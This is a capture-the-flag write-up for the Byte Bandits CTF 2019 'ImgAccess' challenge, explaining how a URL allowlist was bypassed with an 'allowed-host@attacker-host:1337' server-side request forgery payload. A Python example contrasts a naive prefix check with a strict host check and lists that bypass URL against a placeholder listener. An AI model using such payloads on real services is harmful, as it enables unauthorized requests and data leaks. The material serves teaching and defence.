Saturday, April 13, 2019

Byte Bandits CTF 2019 - ImgAccess

by Elber "f0lds" Tavares

Description:

n00b created a super secure website for sharing images.

Do you think you can hack it?

http://imgaccess.ctf.euristica.in

chall

Write-up

When looking at the index, we quickly noticed the uploader and the "Enter image URL" input.

As usual, my first thought was to find an XSS, send the link to the admin and grab a cookie.

I got an alert on the client side with a .svg file, but that did not get me anywhere.

I sent my host fireshellsecurity.team, which was listening on port 1337, but received the following message.

error

Apparently it would only fetch files that were under http://imgaccess.ctf.euristica.in/.

So I decided to try something better: I sent the payload http://[email protected]:1337, checked my host listening on port 1337, and there was the flag.
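The bypass works because a URL of the form `http://allowed-host@other-host:1337` puts the allowed name in the userinfo part while the fetcher actually connects to `other-host`. The following is an added example, not the challenge's code: it assumes the server did a naive prefix check on the allowed host and shows the parsed-host check that would have rejected the payload. `listener.example` is a placeholder for the attacker-controlled host.

```python
from urllib.parse import urlsplit

ALLOWED_HOST = "imgaccess.ctf.euristica.in"


def naive_allowlist(url: str) -> bool:
    """Prefix check of the kind the write-up hints at (assumed, not the
    challenge's real code). It only looks at the start of the string."""
    return url.startswith("http://" + ALLOWED_HOST)


def strict_allowlist(url: str) -> bool:
    """Parse the URL and validate the host the fetcher would really connect to."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError for non-numeric/out-of-range ports
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    # Reject userinfo outright: 'allowed-host@evil' hides the allowed name there.
    if parts.username is not None or parts.password is not None:
        return False
    if parts.hostname is None or parts.hostname.lower() != ALLOWED_HOST:
        return False
    return port in (None, 80, 443)


# Constructed sample inputs (the listener host is a placeholder).
SAMPLES = [
    "http://imgaccess.ctf.euristica.in/images/cat.png",
    "http://listener.example:1337/",
    "http://imgaccess.ctf.euristica.in@listener.example:1337/",
    "http://imgaccess.ctf.euristica.in.listener.example/",
]


def bypasses(url: str) -> bool:
    """True when the naive check accepts a URL the strict check rejects."""
    return naive_allowlist(url) and not strict_allowlist(url)


if __name__ == "__main__":
    for u in SAMPLES:
        print(f"naive={naive_allowlist(u)!s:5} strict={strict_allowlist(u)!s:5} {u}")
```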

flag

I think the intended solution involves some other bypass, maybe with htaccess; some time later, this bypass was not working anymore.

Capture the Flag, Writeup, Web, Server Side Request Forgery